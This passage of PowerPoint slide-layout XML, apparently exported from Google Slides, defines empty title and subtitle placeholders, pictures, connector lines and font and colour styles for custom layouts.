        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Google Shape;24;p3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8511900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300">
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="25" name="Google Shape;25;p3"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630769" y="758040"/>
            <a:ext cx="8511900" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="21425">
            <a:solidFill>
              <a:srgbClr val="B9D8EB"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Google Shape;26;p3"/>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inal Page">
  <p:cSld name="Custom Layout_5">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="202" name="Shape 202"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="203" name="Google Shape;203;p21"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="5492" r="5492" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2439759" y="1289288"/>
            <a:ext cx="4264480" cy="3192451"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="204" name="Google Shape;204;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4051119" y="4738069"/>
            <a:ext cx="4460700" cy="438000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="205" name="Google Shape;205;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1343363" y="251100"/>
            <a:ext cx="6457200" cy="438000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="206" name="Google Shape;206;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2872678" y="714900"/>
            <a:ext cx="3398700" cy="438000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0072CE"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Inter"/>
              <a:buNone/>
              <a:defRPr b="1" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="0072CE"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="207" name="Google Shape;207;p21"/>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inal Page 1">
  <p:cSld name="Custom Layout_5_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="208" name="Shape 208"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="209" name="Google Shape;209;p22"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="5492" r="5492" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2439759" y="1289288"/>
            <a:ext cx="4264480" cy="3192451"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="210" name="Google Shape;210;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4051119" y="4738069"/>
            <a:ext cx="4460700" cy="438000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="211" name="Google Shape;211;p22"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630769" y="730497"/>
            <a:ext cx="8511900" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="21425">
            <a:solidFill>
              <a:srgbClr val="B9D8EB"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="212" name="Google Shape;212;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl7pPr>
